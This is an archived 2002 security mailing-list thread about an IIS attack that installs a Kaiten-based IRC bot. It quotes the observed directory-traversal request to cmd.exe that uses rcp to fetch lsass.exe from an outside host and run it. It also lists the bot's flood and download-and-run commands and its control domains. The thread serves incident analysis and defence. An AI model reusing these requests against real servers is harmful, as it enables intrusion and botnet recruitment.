The Microsoft Baseline security analyzer is good for telling you what patches a computer needs and where to get them. -----Original Message----- From: zeno [mailto:bugtraqat_private] Sent: Tuesday, September 24, 2002 2:29 PM To: MarkCat_private Cc: pjat_private; incidentsat_private Subject: Re: new IIS worm? (rcp lsass.exe) > > Hardening of IIS with the tools available at Microsoft and using URLSCAN > with the EXE blocking on will stop these attacks. > > Patch, patch, patch, recheck the patches and use URLSCAN! Does anyone know of a gui windows tool that scans your system and provides you with a list of needed patches, and then allows you to select, and have it autodownload and install them? I can't seem to find one (needed mostly for iis). - zenoat_private > > Mark Challender > Network Administrator > > ================== > Veni, Vidi, Geeki > ================== > > > -----Original Message----- > From: pjat_private [mailto:pjat_private] > Sent: Monday, September 23, 2002 3:27 AM > To: incidentsat_private > Subject: Re: new IIS worm? (rcp lsass.exe) > > > > Christian Mock: > > >Then it seems to go after the web servers, sending the following: > > >GET > /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+ > . > HTTP/1.0.. > > >and > > >GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0 > > >I've been able to get hold of that lsass.exe binary (9728 bytes), but > >I lack the skills to analyze it; I'll happily mail it to anybody who asks. > > > We have seen this attack from 4 different sources since Sept. 16, and have > informed the owner of 64.21.95.7 and downloaded the lsass.exe for > investigation. > > Based on the attack rate this is most likely a scripted or manual attack, > not a worm. > > Judging from the embedded string in this compressed binary it appears to > be an IRC bot based on the kaiten.c code written by contem@efnet, the > author of the Slapper worm : > > Kaiten Win32 API version 2002 by contem@efnet > > The binary contains these domainnames, most likeky IRC servers used for > controlling the bot: > > telsa5.mine.nu (Korea) > irc.logicfive.net (Taiwan) > moncredo.shacknet.nu (USA) > telsacredo.shacknet.nu (USA) > lar.ath.cx (Taiwan) > > The program accepts commands to make various DOS attacks or download new > version or executables with http: > > NOTICE %s :PUSH <target> <port> <secs> = A push flooder > NOTICE %s :TCP <target> <port> <secs> = A syn flooder > NOTICE %s :UDP <target> <port> <secs> = A udp flooder > NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder > NOTICE %s :NICK <nick> = Changes the nick of the client > NOTICE %s :DISABLE <pass> = Disables all packeting from this > client > NOTICE %s :ENABLE <pass> = Enables all packeting from this > client > NOTICE %s :UPDATE <http address> = Downloads a file off the web and > updates the client > NOTICE %s :RUN <http address> = Downloads a file off the web and > runs it > NOTICE %s :GET <http address> = Downloads a file off the web > NOTICE %s :ADDSERVER <server> = Adds a server to the list > NOTICE %s :DELSERVER <server> = Deletes a server from the list > NOTICE %s :LISTSERVERS = Lists server on the list > NOTICE %s :KILL = Kills the client > NOTICE %s :VERSION = Requests version of client > NOTICE %s :HELP = Displays this > > > There seems also to be a default account and password in the german > language included in this specific version of Kaiten. > > The IIS attack that tries to inject this Trojan usually has another URL > with "CONNECT chat.vtm.be:6667". This is an attempt to proxy an connection > to port 6667(IRC) on chat.vtm.be. > > > > Peter Jelver > ... > > eSec A/S > > http://www.esec.dk > ............................................................................ > . > > PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A 128F D85C A7D7 > > > > > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Sep 26 2002 - 22:22:06 PDT